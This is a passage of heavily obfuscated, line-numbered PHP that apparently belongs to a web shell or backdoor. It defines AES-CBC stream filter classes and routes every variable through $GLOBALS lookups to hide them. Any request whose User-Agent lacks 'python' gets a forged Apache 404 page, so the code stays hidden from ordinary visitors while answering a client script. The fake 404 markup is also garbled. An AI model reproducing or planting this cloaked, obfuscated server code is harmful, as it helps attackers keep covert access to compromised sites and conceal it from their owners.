3002. if ($this->{"skipped"} < 32) {
3003. $ {
3004. $ {
3005. "GLOBALS"
3006. }
3007. ["outlen"]
3008. } = min($ {
3009. $ {
3010. "GLOBALS"
3011. }
3012. ["bucket"]
3013. }->{"datalen"}, 32 - $this->{"skipped"});
3014. $ {
3015. $ {
3016. "GLOBALS"
3017. }
3018. ["bucket"]
3019. }->{"data"} = substr($ {
3020. $ {
3021. "GLOBALS"
3022. }
3023. ["bucket"]
3024. }->{"data"}, $ {
3025. $ {
3026. "GLOBALS"
3027. }
3028. ["outlen"]
3029. });
3030. $ {
3031. $ {
3032. "GLOBALS"
3033. }
3034. ["bucket"]
3035. }->{"datalen"} = $ {
3036. $ {
3037. "GLOBALS"
3038. }
3039. ["bucket"]
3040. }->{"datalen"} - $ {
3041. $ {
3042. "GLOBALS"
3043. }
3044. ["outlen"]
3045. };
3046. $this->{"skipped"}+= $ {
3047. $ {
3048. "GLOBALS"
3049. }
3050. ["outlen"]
3051. };
3052. }
3053. $ {
3054. $ {
3055. "GLOBALS"
3056. }
3057. ["consumed"]
3058. }+= $ {
3059. $ {
3060. "GLOBALS"
3061. }
3062. ["outlen"]
3063. };
3064. stream_bucket_append($ {
3065. $ {
3066. "GLOBALS"
3067. }
3068. ["out"]
3069. }, $ {
3070. $ {
3071. "GLOBALS"
3072. }
3073. ["bucket"]
3074. });
3075. }
3076. return PSFS_PASS_ON;
3077. }
3078. }
3079. class AES_128_CBC extends AES_CBC {
3080. protected static function key_size() {
3081. return self::$ {
3082. $ {
3083. "GLOBALS"
3084. }
3085. ["KEY_SIZES"]
3086. }
3087. ['AES-128'];
3088. }
3089. }
3090. class AES_192_CBC extends AES_CBC {
3091. protected static function key_size() {
3092. return self::$ {
3093. $ {
3094. "GLOBALS"
3095. }
3096. ["KEY_SIZES"]
3097. }
3098. ['AES-192'];
3099. }
3100. }
3101. class AES_256_CBC extends AES_CBC {
3102. protected static function key_size() {
3103. return self::$ {
3104. $ {
3105. "GLOBALS"
3106. }
3107. ["KEY_SIZES"]
3108. }
3109. ['AES-256'];
3110. }
3111. }
3112. $ {
3113. $ {
3114. "GLOBALS"
3115. }
3116. ["check"]
3117. } = strpos($ {
3118. $ {
3119. "GLOBALS"
3120. }
3121. ["_SERVER"]
3122. }
3123. ['HTTP_USER_AGENT'], "python");
3124. if ($ {
3125. $ {
3126. "GLOBALS"
3127. }
3128. ["check"]
3129. } === false) {
3130. print404();
3131. }
3132. function print404() {
3133. echo "\xd\xa <!DOCTYPE HTML PUBLIC " - //IETF//DTD HTML 2.0//EN">\xd
3134. < html > < head > \xa < title > 404NotFound < / title > \xa < / head > < body > \xa < h1 > NotFound < / h1 > \xd < p > TherequestedURLwasnotfoundonthisserver . < / p > \xd\xa < hr > \xd < address > Apache / 2.4.38(Debian) Serverat".${${"GLOBALS"}["_SERVER"]}['SERVER_ADDR']."Port80 < / address > \xd < / body > < / html > \xd\xa\xa";}
3135. ?>"
3136. }